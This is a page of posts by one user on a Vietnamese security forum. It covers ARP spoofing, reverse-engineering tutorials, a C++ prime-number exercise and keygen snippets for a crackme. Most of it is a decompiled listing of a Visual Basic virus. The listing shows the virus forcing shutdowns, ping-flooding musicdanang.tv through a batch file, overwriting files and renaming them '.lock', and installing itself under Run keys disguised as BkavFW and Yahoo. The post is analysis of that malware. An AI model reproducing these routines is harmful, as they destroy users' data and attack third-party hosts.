English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Messages posted by: hacnho  XML
Profile for hacnho Messages posted by hacnho [ number of posts not being displayed on this page: 6 ]
 
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Có thể bị ARP spoofing, nó broadcast địa chỉ MAC của CF server, client CF kết nối tới CF server đi qua server con này. Xem thêm về ARP spoofing:
/hvaonline/posts/list/20575.html
http://en.wikipedia.org/wiki/ARP_spoofing

Thủ thuật reverse engineering  Empty  Go to message
From Shub-Nigurrath :

Hi everybody.

I just finished writing a new tutorial: "Primer on Reversing Jailbroken iPhone Native Applications"

This tutorial is another primer I decided to write (similarly to what I did for Symbian), following my early experiences in the iPhone/iPood Touch world. We are talking of the iPhone (and the little brother iPood Touch), the Apple telephone which doesn’t support Java, nor Flash, cannot be used like a modem, do not fully support Bluetooth, do not allow to install third party applications (officially at least), which cost is very high and that you can only be used with those telecom carriers chosen by Apple just with EDGE network.

Once unlocked (using techniques I will not explain in much details) a new world opens up: a lot of native programs (not web) are awaiting your patches and customizations. It’s a completely different world for those of you already accustomed to the Win32 environment, but also has some differences for those already reversing in the Mac world. The OS is an OSX, build up from FreeBSD, but it isn\'t the MAC OSX and the processor is an ARM, then RISC assembler not easy to handle at all (like for Symbian phones). At the moment all the existing native applications are built using the unofficial SDK (but the official SDK is announced soon) and are most of the times, but not always, completely free. The programming technologies are anyway the same already used for MAC: COCOA/Darwin and underneath objective-C.

Have phun,
Shub 



You can find it here:
Code:
http://rapidshare.com/files/113082348/Primer_on_Reversing_Jailbroken_iPhone_Native_Applications_v10_by_Shub-Nigurrath.rar
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Chạy cái này, rồi post log lên đi bạn:

Code:
http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Ku vuadapass cũng chạy vô rồi à smilie! Ok, em viết hoặc tìm dùm anh soft phân mảnh ổ cứng viết bằng VB xem, hoặc tìm không có thì có thể viết ra, nếu em gặp trục trặc thì anh support phần C cho em chuyển về VB smilie)!
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Một chương trình hay, good! Nhưng tui chưa xài smilie vì cái vụ change fonts là không thích rồi smilie !

@All: Attach src lên cho bà con nè, nhớ là nếu có lấy code của người ta vào soft mình thì để lại vài dòng thx nhé smilie .
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Căng nhỉ, bạn một Linux LiveCD nào không, Boot từ đây, mount các ổ đĩa của win, chép qua. Sau đó vào Windows, dùng RunScanner để truy xem process nào lạ không, nên nhấn nút Scan trên tools này để nó phân tích tình trạng máy của bạn, nếu được bạn post log của nó lên đây nhé.

PS: một số chương trình có khả năng hide dưới taskmanager và taskkill của MS. Do đó nếu ko nhìn thấy nó là điều bình thường.
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Sặc, pà con REAOnline.net qua đây dữ vậy, 2 mod 1 ẹc min. Mẹ ơi smilie. Hí hí, bây giờ mới để ý cái sign của lão kiên


Có những con người mới đôi ba tuổi đời.....
Cuộc sống mới bắt đầu đã cho rằng mình thấu hết ..
Làm được gì ? Và đã có gì ?
Chỉ học đòi thói chê bai.... Cần nhìn lại về chính thân mình ....
Hình hài chỉ là con số 0 ....... Hình hài chỉ là con số 0..... Con số 0..!!!
 
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Hì anh, em có debug đâu, thuận tay xem code chơi mà. Em nói thật đấy... Không tin anh hỏi VXer xem, em nàm trong 1' cái này, chắc ảnh chỉ nàm 15s smilie!

Mình hem bít gì hít smilie, code bạn code vãi cả linh hồn thí nên mún xỉu òi smilie! BKAV mình không quan tâm lắm, mình xài máy không cài AV bạn à. Về mặt nguyên tắc thì AV nhận diện virus theo một đoạn mã nhị phân, hoặc một chuỗi string đặc trưng, hoặc một hành động khả nghi nào đó như hooking hệ thống, mở port, sử dụng một protocol nào đó. Nói chung khá nhiều trường hợp bạn à. Nếu thực sự bạn thích VB thì code anti debug 1 app hay virus nào đó đi, mình làm cho smilie! Nhưng cũng nói cho bạn rõ là HVA chỉ là nơi thảo luận, không phải là nơi mà bạn lên đây khoe tài vặt, rồi châm chọc nhau nhé. Mình có quyền mời bạn ra đấy.

Thân!

@VXer: dòm nick thấy quen quen smilie!
Thảo luận hệ điều hành Windows  Empty  Go to message
Tại sao không API hooking nhỉ smilie?. Thông thường các tools cheat đều dùng một số API cố định để "tham quan" process của bạn thì cách chặn tốt nhất là dùng API hooking (GameGuard là một ví dụ).
Thảo luận hệ điều hành Windows  Empty  Go to message
Cái này nói cả ngày hem hít smilie. Nói chung nếu bạn thích cái nghiệp anti debug-anticheat thì khuyên thật lòng đừng smilie. Ngay cảm GameGuard,X-Trap, HackShield...nó dùng cả cơ chế chặn API, CRC memory mà còn có cách vượt qua mà.

Nếu thích tìm hiểu thì bạn xem cái này nhé: http://www.securityfocus.com/infocus/1893
Thảo luận hệ điều hành Windows  Empty  Go to message
CodeProject.com, đăng ký một tài khoản rồi search đi. Có hết đó!
Thảo luận hệ điều hành Windows  Empty  Go to message
Lập trình cho 89xx thì pác dùng chương trình này cũng được Pinnacle, cái này viết bằng ASM, còn nếu viết bằng C thì dùng Keil C, cái này lập trình được cho AVR đó.
Lập trình LCD cho NOKIA thì tự kiếm datasheet của màn hình đó rùi thiết kế phần cứng thôi chứ không có soft nào làm dùm đâu. Chương trình mô phỏng thì xài thằng Proteus 7. Kô có soft mô phỏng cho LCD của Nokia đâu.

Tham khảo thêm :

Atmel AVR Design Contest

http://www.circuitcellar.com/avr2006/
Thảo luận hệ điều hành Windows  Empty  Go to message
Bạn tránh để hàm main xử lý nhiều công việc quá như thế. Về thuật toán tìm số ngt thì nhiều cách lắm, cách của bạn cũng là một trong những cách đó . Tui post lại bài C++ ngày xưa mới học smilie

Code:
//Chuong trinh liet ke cac so nguyen to <n (2<n<=100)
#include<iostream.h>;
#include <iomanip.h>;
int ngto(int n);
void nhapn(int &n);
void demvaxuat(int n);
//ham kiem tra so nguyen to dua vao so uoc
int ngto(int n)
{
int dem=0;
for (int i=1;i<=n;++i)
if (n%i==0)
dem = dem + 1;
if ( dem == 2 )
return 1; // la so nguyen to
else
return 0; // ko phai so nguyen to
}
//ham nhap 2<n<=100)
void nhapn(int &n)
{
do
{
cout<<"Nhap n:";
cin>>n;
} while (n<2||n>100);
}
//Dem va xuat so nguyen to
void demvaxuat(int n)
{
int dem=0;
for (int i=2;i<n;i++)
{
if (ngto(i))
{
cout<<i<<setw(4);
dem++;
}
}
}
//Ham main
void main()
{
int n;
nhapn(n);
demvaxuat(n);
}

smilie
Thủ thuật reverse engineering  Empty  Go to message
Chắc tui quên để thoát vòng lặp smilie. Mà test ok mà, tại lão nghịch dại bấm nhiều lần thôi smilie. Keygen lão viết C++ dòm vãi nhỉ. Tui thì Wasm nàm tới. C++ dốt vãi smilie!
Thủ thuật reverse engineering  Empty  Go to message
Ờ, tui quên mất vụ này, tại vì cái Olly tui, tui config hết các vụ dectect này smilie , khỏi làm tay cho nó mệt smilie . Lão thik thì tui đưa cái plugin tự hide hết các anti-olly trick cho ! smilie

Keygen nè kiên smilie
Thủ thuật reverse engineering  Empty  Go to message
smilie

Code:
// BOOL __stdcall GetVolumeInformationA(LPCSTR lpRootPathName, LPSTR lpVolumeNameBuffer, DWORD nVolumeNameSize, LPDWORD lpVolumeSerialNumber, LPDWORD lpMaximumComponentLength, LPDWORD lpFileSystemFlags, LPSTR lpFileSystemNameBuffer, DWORD nFileSystemNameSize);
extern DWORD VolumeSerialNumber;
extern char FileSystemNameBuffer[];
BOOL GetHDDSerial()
{
return GetVolumeInformationA("C:\\", 0, 0, &VolumeSerialNumber, 0, (LPDWORD)0x14, FileSystemNameBuffer, 0x14u);
}


Dịch từ code của XIANUA, btw thanx smilie :

Code:
G.data
Volume dd 0
sMl dd 0
sFs dd 0
sResult dd MAX_PATH dup(?)
.data?
hWnd dd ?
.code
start:
INVOKE GetVolumeInformation, SADD("C:\"), NULL, NULL, ADDR Volume, ADDR sMl, ADDR sFs, NULL, NULL
INVOKE dw2hex, [Volume], ADDR sResult
INVOKE MessageBox, hWnd, ADDR sResult, SADD("Info"), MB_ICONINFORMATION OR MB_OK
INVOKE ExitProcess, NULL
End start


Và tạo key file:

Code:
extern DWORD NumberOfBytesWritten;
extern char FileName[];
extern HANDLE hFile;
extern char FileName[];
BOOL CreateKeyFile()
{
int tmp;
GetCurrentDirectoryA(0xC8u, FileName);
lstrcatA(FileName, "\\EarnUrRight.dat");
hFile = CreateFileA(FileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
tmp = lstrlenA("Allow Me to Retort!");
WriteFile(hFile, "Allow Me to Retort!", tmp, &NumberOfBytesWritten, 0);
return CloseHandle(hFile);
}


smilie
Thảo luận virus, trojan, spyware, worm...  Empty  Go to message
Mới xem con virus Lover của bạn. Nhiều đoạn hài vật smilie!


Object: F
Private Sub M_Timer() Address: 40EDD0
Private Sub W_Timer() Address: 40EF90
Private Sub Y_Timer() Address: 40FCA0
Private Sub S_Timer() Address: 40EEB0
Private Sub Form_Load() Address: 40E3A0
Public Function PathCover(Path) Address: 407870
Public Function RndName() Address: 407980
Public Sub ScanSys() Address: 407C10
Public Sub ScanDir(Path) Address: 407FC0
Public Sub ScanA() Address: 408280
Public Function FindUSB() Address: 408650
Public Sub MakeTmp() Address: 408D20
Public Sub LoadTmp() Address: 408D90
Public Sub SaveTmp() Address: 408F40
Public Sub LockFile(FileName) Address: 409140
Public Sub UnLockFile(FileName) Address: 409360
Public Function EnCode(StringValue) Address: 409520
Public Sub Destroy() Address: 4097E0
Public Sub BitToy() Address: 40B270
Public Sub DelayAV() Address: 40B920
Public Sub CheckMe() Address: 40BBF0
Public Function SafeMe(AntiPro) Address: 40BE50
Public Sub AutoSafe() Address: 40BFB0
Public Sub SysCopy() Address: 40C470
Public Sub InsertChar(Code) Address: 40CF30
Public Sub YSent() Address: 40D180
Public Function YCheck(KeyRead, MyVoice) Address: 40E100 


Đoạn này:
Code:
Public Sub BitToy() '40B270
loc_0040B295: var_08 = &H401320
loc_0040B2A7: call eax+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_0040B2E0: var_38 = 80020004h
loc_0040B2EA: Randomize(10)
loc_0040B2F3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B2FC: var_38 = 80020004h
loc_0040B300: var_40 = 10
loc_0040B307: var_40 = Rnd(%x2)
loc_0040B30D: fstp real4 ptr var_000000C4
loc_0040B313: fld real4 ptr var_000000C4
loc_0040B319: fmul real4 ptr [0040131Ch] ;
loc_0040B32A: fstp real4 ptr var_48
loc_0040B32D: fstsw ax
loc_0040B331: If MSVBVM60.DLL.__vbaFreeVar = 0 Then
loc_0040B346: call MSVBVM60.DLL.__vbaUI1Var(Round(4, esi))
loc_0040B36B: If var_60 = 0 Then
loc_0040B370: call eax+00000300h(arg_08)
loc_0040B37B: var_30 = IsSet(eax+00000300h(arg_08))
loc_0040B38B: call edx+64h(eax+00000300h(arg_08), 00002710h)
loc_0040B392: If edx+64h(eax+00000300h(arg_08), 00002710h) < esi Then
loc_0040B39D: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+64h(eax+00000300h(arg_08), 00002710h), eax+00000300h(arg_08), 00405C88h, 00000064h)
loc_0040B3A3: End If
loc_0040B3A6: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B3AC: End If
loc_0040B3B0: If byte ptr var_1C = 01h Then
loc_0040B3B5: call MSVBVM60.DLL.__vbaStrI2(esi, esi, esi)
loc_0040B3C6: call MSVBVM60.DLL.__vbaStrMove
loc_0040B3CD: call MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)
loc_0040B3DD: call MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove))
loc_0040B3E4: Proc_004058C8(MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)), MSVBVM60.DLL.__vbaStrI2(esi, esi, esi), "")
loc_0040B3E9: call MSVBVM60.DLL.__vbaSetSystemError(MSVBVM60.DLL.__vbaStrToAnsi("", "set cdaudio door open", MSVBVM60.DLL.__vbaStrToAnsi("", MSVBVM60.DLL.__vbaStrMove)))
loc_0040B406: GoTo loc_40B40E
loc_0040B408: End If
loc_0040B40E: 'Referenced from 0040B406
loc_0040B412: If byte ptr var_1C = 02h Then
loc_0040B431: var_68 = 80020004h
loc_0040B434: var_58 = 80020004h
loc_0040B437: var_00000098 = "Hi world !"
loc_0040B441: var_000000A0 = 8
loc_0040B45A: var_00000088 = "Hello my name is HoaiTranMGF by Bit.Kill3r"
loc_0040B464: var_00000090 = 8
loc_0040B489: MsgBox("Hello my name is HoaiTranMGF by Bit.Kill3r", 00001000h, "Hi world !", 10, 10)
loc_0040B4AA: End If
loc_0040B4AE: If byte ptr var_1C = 03h Then
loc_0040B4B9: var_00000088 = "shutdown -f"
loc_0040B4C3: var_00000090 = 8
loc_0040B4CD: var_40 = "shutdown -f"
loc_0040B4D8: var_40 = Shell(esi, %x3)
loc_0040B4E1: fstp st(0)
loc_0040B4E3: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B4E9: End If
loc_0040B4ED: If byte ptr var_1C = 04h Then
loc_0040B4FF: var_40 = Chr(00000022h)
loc_0040B507: var_70 = Chr(00000022h)
loc_0040B51A: var_00000090 = 8
loc_0040B520: var_000000A0 = 8
loc_0040B530: var_00000088 = "shutdown -s -t 10 -c"
loc_0040B53A: var_00000098 = "Hello ! my name is HoaiTrangMGF by Bit.Kill3r"
loc_0040B544: call MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi)
loc_0040B552: call MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi))
loc_0040B55D: call MSVBVM60.DLL.__vbaVarCat("", var_70, MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi)))
loc_0040B560: MSVBVM60.DLL.__vbaVarCat("", var_70, MSVBVM60.DLL.__vbaVarCat("", var_000000A0, MSVBVM60.DLL.__vbaVarCat("", var_40, var_00000090, esi))) = Shell(%x2, %x3)
loc_0040B57C: fstp st(0)
loc_0040B58A: End If
loc_0040B58E: If byte ptr "" >= 05h Then
loc_0040B593: call ecx+00000728h(arg_08)
loc_0040B59B: If ecx+00000728h(arg_08) < esi Then
loc_0040B5A9: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000728h(arg_08), arg_08, 00405544h, 00000728h)
loc_0040B5AF: End If
loc_0040B5AF: End If
loc_0040B5BE: call &(":home", "")
loc_0040B5C5: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5CD: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B5D4: call MSVBVM60.DLL.__vbaStrMove
loc_0040B5D9: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B5EA: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B5F4: call MSVBVM60.DLL.__vbaUI1I2
loc_0040B600: If MSVBVM60.DLL.__vbaUI1I2 <= MSVBVM60.DLL.__vbaUI1I2 Then
loc_0040B60B: call &("ping", "")
loc_0040B612: call MSVBVM60.DLL.__vbaStrMove
loc_0040B61A: call &("musicdanang.tv", MSVBVM60.DLL.__vbaStrMove)
loc_0040B621: call MSVBVM60.DLL.__vbaStrMove
loc_0040B629: call &("-n 1 -l 65500", MSVBVM60.DLL.__vbaStrMove)
loc_0040B630: call MSVBVM60.DLL.__vbaStrMove
loc_0040B638: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B63F: call MSVBVM60.DLL.__vbaStrMove
loc_0040B65A: al = al + bl
loc_0040B65C: If Not Asm.b_flag Then
loc_0040B662: GoTo loc_40B5F6
loc_0040B664: End If
loc_0040B66D: call &("ping", "")
loc_0040B674: call MSVBVM60.DLL.__vbaStrMove
loc_0040B67C: call &("musicdanang.tv", MSVBVM60.DLL.__vbaStrMove)
loc_0040B683: call MSVBVM60.DLL.__vbaStrMove
loc_0040B68B: call &("-n 2 -l 65500", MSVBVM60.DLL.__vbaStrMove)
loc_0040B692: call MSVBVM60.DLL.__vbaStrMove
loc_0040B69A: call &("13#1", MSVBVM60.DLL.__vbaStrMove)
loc_0040B6A1: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6C3: call &("goto home", "")
loc_0040B6CA: call MSVBVM60.DLL.__vbaStrMove
loc_0040B6D3: If 411340h = 0 Then
loc_0040B6DF: CreateObject(00405AA8h, 00411340h)
loc_0040B6E5: End If
loc_0040B6F2: call eax+14h(00411340h, var_30)
loc_0040B6F9: If eax+14h(00411340h, var_30) < 0 Then
loc_0040B704: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+14h(00411340h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B70A: End If
loc_0040B716: call edx+50h(var_30, "")
loc_0040B71D: If edx+50h(var_30, "") < 0 Then
loc_0040B728: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+50h(var_30, ""), var_30, 00405AB8h, 00000050h)
loc_0040B72E: End If
loc_0040B734: var_20 = 0
loc_0040B73B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B74B: call edx+000006F8h(arg_08, "", "")
loc_0040B753: If edx+000006F8h(arg_08, "", "") < 0 Then
loc_0040B761: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040B767: End If
loc_0040B770: call &("POD.bat", "")
loc_0040B777: call MSVBVM60.DLL.__vbaStrMove
loc_0040B780: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_0040B7A0: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B7AE: call Put #(00000000h, "", 00000001h)
loc_0040B7B6: Close 00000001h
loc_0040B7C3: If 411340h = 0 Then
loc_0040B7CF: CreateObject(00405AA8h, 00411340h)
loc_0040B7D5: End If
loc_0040B7E2: call ecx+14h(00411340h, var_30)
loc_0040B7E9: If ecx+14h(00411340h, var_30) < 0 Then
loc_0040B7F4: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+14h(00411340h, var_30), 00411340h, 00405E80h, 00000014h)
loc_0040B7FA: End If
loc_0040B806: call ecx+50h(var_30, var_20)
loc_0040B80D: If ecx+50h(var_30, var_20) < 0 Then
loc_0040B818: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h(var_30, var_20), var_30, 00405AB8h, 00000050h)
loc_0040B81E: End If
loc_0040B824: var_20 = 0
loc_0040B82B: call MSVBVM60.DLL.__vbaStrMove
loc_0040B83B: call eax+000006F8h(arg_08, "", "")
loc_0040B843: If eax+000006F8h(arg_08, "", "") < 0 Then
loc_0040B851: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040B857: End If
loc_0040B860: call &("POD.bat", "")
loc_0040B86B: var_40 = 8
loc_0040B872: var_40 = Shell(00000000h, %x3)
loc_0040B882: fstp st(0)
loc_0040B890: call MSVBVM60.DLL.__vbaFreeObj
loc_0040B899: call MSVBVM60.DLL.__vbaFreeVar
loc_0040B8A5: GoTo loc_40B8EB
loc_0040B8C5: call MSVBVM60.DLL.__vbaFreeObj(0040B8F5h)
loc_0040B8EA: ret
loc_0040B8EB: 'Referenced from 0040B8A5
loc_0040B8EE: call MSVBVM60.DLL.__vbaFreeStr
loc_0040B8F4: ret
loc_0040B8FB: call ecx+08h(arg_08)
loc_0040B911: retn 0004h
loc_0040B914: End If
loc_0040B914: GoTo loc_MSVBVM60.DLL.__vbaFPException
loc_0040B919: End If
loc_0040B919: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub


Lock file kiểu này đây hả smilie!
Code:
Public Sub LockFile(FileName) '409140
loc_00409162: var_08 = &H401250
loc_00409174: call ecx+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_00409199: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_004091A4: "This File Was Destroy By HoaiTrang MGF [Bit.Kill3r] = Len(%x2)
loc_004091AC: call MSVBVM60.DLL.__vbaI2I4
loc_004091C8: If 00000001h <= var_64 Then
loc_004091D0: call MSVBVM60.DLL.__vbaGet3(00000001h, var_20, 00000001h)
loc_004091DC: and eax, 000000FFh
loc_004091E6: var_50 = ""
loc_004091E9: var_58 = 8
loc_004091F0: var_38 = Chr(var_20)
loc_00409202: call MSVBVM60.DLL.__vbaVarCat("", var_38, var_58)
loc_00409209: call MSVBVM60.DLL.__vbaStrVarMove(MSVBVM60.DLL.__vbaVarCat("", var_38, var_58))
loc_00409214: call MSVBVM60.DLL.__vbaStrMove
loc_0040922C: cx = cx + si
loc_0040922F: If Err.Number <> 0 Then GoTo loc_0040934F
loc_00409237: GoTo loc_4091C2
loc_00409239: End If
loc_0040923F: Close %x1
loc_0040924D: call Open #(00000020h, FFFFFFFFh, 00000001h, edx)
loc_0040925B: call MSVBVM60.DLL.__vbaStrCopy
loc_00409269: call Put #(00000000h, "", 00000001h)
loc_00409278: call MSVBVM60.DLL.__vbaFreeStr
loc_0040927C: Close 00000001h
[b] loc_00409289: call &(".lock", edx)[/b]
loc_00409294: call MSVBVM60.DLL.__vbaStrMove
loc_0040929D: call Open #(00000020h, FFFFFFFFh, 00000001h, MSVBVM60.DLL.__vbaStrMove)
loc_004092A6: call MSVBVM60.DLL.__vbaFreeStr
loc_004092B6: call ecx+00000724h(arg_08, "", "")
loc_004092BE: If ecx+00000724h(arg_08, "", "") < 0 Then
loc_004092CF: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+00000724h(arg_08, "", ""), arg_08, 00405544h, 00000724h)
loc_004092D5: End If
loc_004092DB: var_24 = 0
loc_004092E2: call MSVBVM60.DLL.__vbaStrMove
loc_004092EC: call Put #(00000000h, "", 00000001h)
loc_004092F5: call MSVBVM60.DLL.__vbaFreeStr
loc_004092F9: Close 00000001h
loc_00409300: GoTo loc_409326
loc_00409325: ret
loc_00409326: 'Referenced from 00409300
loc_00409329: call MSVBVM60.DLL.__vbaFreeStr(00409330h)
loc_0040932F: ret
loc_00409336: call ecx+08h(arg_08)
loc_0040934C: retn 0008h
loc_0040934F: 'Referenced from 040922F
loc_0040934F: call MSVBVM60.DLL.__vbaErrorOverflow
End Sub


Và" smilie)
Code:
Public Sub SysCopy() '40C470
loc_0040C495: var_08 = &H4013B0
loc_0040C4A7: call eax+04h(arg_08, edi, esi, ebx, fs:[00h], MSVBVM60.DLL.__vbaExceptHandler, ebp)
loc_0040C4F9: If 411340h = edi Then
loc_0040C505: CreateObject(00405AA8h, 00411340h)
loc_0040C50B: End If
loc_0040C518: call ecx+14h(00411340h, "")
loc_0040C51F: If ecx+14h(00411340h, "") < edi Then
loc_0040C52A: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+14h(00411340h, ""), 00411340h, 00405E80h, 00000014h)
loc_0040C530: End If
loc_0040C53C: call ecx+50h("", "")
loc_0040C543: If ecx+50h("", "") < edi Then
loc_0040C54E: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h("", ""), "", 00405AB8h, 00000050h)
loc_0040C554: End If
loc_0040C563: call MSVBVM60.DLL.__vbaStrMove
loc_0040C570: call eax+000006F8h(arg_08, "", "")
loc_0040C578: If eax+000006F8h(arg_08, "", "") < edi Then
loc_0040C586: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040C58C: End If
loc_0040C592: If 00411340h = edi Then
loc_0040C59E: CreateObject(00405AA8h, 00411340h)
loc_0040C5A4: End If
loc_0040C5B1: call eax+14h(00411340h, "")
loc_0040C5B8: If eax+14h(00411340h, "") < 0 Then
loc_0040C5C3: call MSVBVM60.DLL.__vbaHresultCheckObj(eax+14h(00411340h, ""), 00411340h, 00405E80h, 00000014h)
loc_0040C5C9: End If
loc_0040C5D5: call edx+58h("", "")
loc_0040C5DC: If edx+58h("", "") < 0 Then
loc_0040C5E7: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+58h("", ""), "", 00405AB8h, 00000058h)
loc_0040C5ED: End If
loc_0040C5F8: call edx+000006F8h(arg_08, esi+48h, "")
loc_0040C600: If edx+000006F8h(arg_08, esi+48h, "") < 0 Then
loc_0040C60E: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+48h, ""), arg_08, 00405544h, 000006F8h)
loc_0040C614: End If
loc_0040C623: call &("UnInstall.exe", "")
loc_0040C62A: call MSVBVM60.DLL.__vbaStrMove
loc_0040C635: call &("", "", MSVBVM60.DLL.__vbaStrMove)
loc_0040C63C: call MSVBVM60.DLL.__vbaStrMove
loc_0040C644: call &(".exe", MSVBVM60.DLL.__vbaStrMove)
loc_0040C64B: call MSVBVM60.DLL.__vbaStrMove
loc_0040C64E: FileCopy MSVBVM60.DLL.__vbaStrMove, %x2
loc_0040C692: If 411340h = 0 Then
loc_0040C69E: CreateObject(00405AA8h, 00411340h)
loc_0040C6A4: End If
loc_0040C6B6: call edx+14h(411340h, "")
loc_0040C6BD: If edx+14h(411340h, "") < 0 Then
loc_0040C6CE: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+14h(411340h, ""), 411340h, 00405E80h, 00000014h)
loc_0040C6D4: End If
loc_0040C6E4: call ecx+50h("", "")
loc_0040C6EB: If ecx+50h("", "") < 0 Then
loc_0040C6FC: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+50h("", ""), "", 00405AB8h, 00000050h)
loc_0040C702: End If
loc_0040C708: var_18 = 0
loc_0040C70F: call MSVBVM60.DLL.__vbaStrMove
loc_0040C71C: call edx+000006F8h(arg_08, "", "")
loc_0040C724: If edx+000006F8h(arg_08, "", "") < 0 Then
loc_0040C732: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, "", ""), arg_08, 00405544h, 000006F8h)
loc_0040C738: End If
loc_0040C73F: If 411340h = 0 Then
loc_0040C74B: CreateObject(00405AA8h, 00411340h)
loc_0040C751: End If
loc_0040C763: call edx+14h(411340h, "")
loc_0040C76A: If edx+14h(411340h, "") < 0 Then
loc_0040C77B: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+14h(411340h, ""), 411340h, 00405E80h, 00000014h)
loc_0040C781: End If
loc_0040C791: call ecx+58h("", "")
loc_0040C798: If ecx+58h("", "") < 0 Then
loc_0040C7A9: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+58h("", ""), "", 00405AB8h, 00000058h)
loc_0040C7AF: End If
loc_0040C7BA: call edx+000006F8h(arg_08, esi+4Ch, "")
loc_0040C7C2: If edx+000006F8h(arg_08, esi+4Ch, "") < 0 Then
loc_0040C7D0: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+4Ch, ""), arg_08, 00405544h, 000006F8h)
loc_0040C7D6: End If
loc_0040C7DF: call &("Unt32.exe", "")
loc_0040C7E6: call MSVBVM60.DLL.__vbaStrMove
loc_0040C7F1: call &("", "", MSVBVM60.DLL.__vbaStrMove)
loc_0040C7F8: call MSVBVM60.DLL.__vbaStrMove
loc_0040C800: call &(".exe", MSVBVM60.DLL.__vbaStrMove)
loc_0040C807: call MSVBVM60.DLL.__vbaStrMove
loc_0040C80A: FileCopy MSVBVM60.DLL.__vbaStrMove, %x2
loc_0040C857: var_000000B4 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BkavFW"
loc_0040C861: var_000000BC = 8
loc_0040C867: call edx+000006F8h(arg_08, esi+48h, var_18)
loc_0040C86F: If edx+000006F8h(arg_08, esi+48h, var_18) < 0 Then
loc_0040C87D: call MSVBVM60.DLL.__vbaHresultCheckObj(edx+000006F8h(arg_08, esi+48h, var_18), arg_08, 00405544h, 000006F8h)
loc_0040C883: End If
loc_0040C88C: call &("UnInstall.exe", var_18)
loc_0040C893: var_000000EC = 8
loc_0040C8A4: var_4C = 8
loc_0040C912: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040C915: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040C921: call MSVBVM60.DLL.__vbaFreeStr
loc_0040C92A: call MSVBVM60.DLL.__vbaFreeVar
loc_0040C93B: var_000000B4 = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yahoo"
loc_0040C945: var_000000BC = 8
loc_0040C94F: call ecx+000006F8h(arg_08, esi+48h, var_18)
loc_0040C957: If ecx+000006F8h(arg_08, esi+48h, var_18) < 0 Then
loc_0040C965: call MSVBVM60.DLL.__vbaHresultCheckObj(ecx+000006F8h(arg_08, esi+48h, var_18), arg_08, 00405544h, 000006F8h)
loc_0040C96B: End If
loc_0040C974: call &("UnInstall.exe", var_18)
loc_0040C988: var_4C = 8
loc_0040C98B: var_000000EC = 8
loc_0040C9FB: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
